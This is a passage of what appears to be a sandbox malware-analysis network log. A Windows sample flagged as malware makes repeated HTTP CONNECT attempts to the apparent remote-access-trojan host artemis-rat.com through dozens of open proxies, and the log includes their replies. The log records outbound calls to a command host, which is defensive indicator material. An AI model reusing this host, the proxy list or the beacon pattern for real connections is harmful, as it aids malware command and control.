                                              Mar 11, 2024 08:37:22.926053047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.568998098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.163357019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              197192.168.2.45047391.189.177.19031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.917177916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.239572048 CET1286INHTTP/1.1 403 Forbidden
                                              Server: squid/5.7
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3628
                                              X-Squid-Error: ERR_ACCESS_DENIED 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              X-Cache: MISS from lb1
                                              X-Cache-Lookup: NONE from lb1:3128
                                              Via: 1.1 lb1 (squid/5.7)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              198192.168.2.450652142.54.235.941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.917895079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              199192.168.2.44979051.158.79.76163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.918203115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.737879038 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              200192.168.2.4508874.182.9.1084437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.922316074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              201192.168.2.45048347.243.205.131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.923552036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              202192.168.2.450626138.197.92.11045277284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.923552036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.459937096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.131844044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.475564957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.163582087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866674900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.554274082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.053952932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              203192.168.2.450389103.153.154.6807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.924429893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.360059023 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              204192.168.2.450549190.69.157.2139997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.928225040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.289577007 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              205192.168.2.45065838.162.3.24531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.928231955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.340585947 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              206192.168.2.450487203.19.38.11410807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.930308104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.261569023 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.22.0
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              207192.168.2.45066538.162.16.16631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.931658030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.354093075 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              208192.168.2.44983566.228.33.190243607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.932178974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.960115910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.073050976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.163368940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:42.257165909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:54.256901979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:06.334980011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:30.335072994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:18.334999084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              209192.168.2.449770148.72.209.174380887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.932918072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.069490910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.163460016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.257191896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:42.257160902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:54.256985903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:06.366333008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:30.381968975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:18.381870031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              210192.168.2.45066066.228.35.209448097284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.933228970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.459912062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.116192102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.428692102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.054483891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
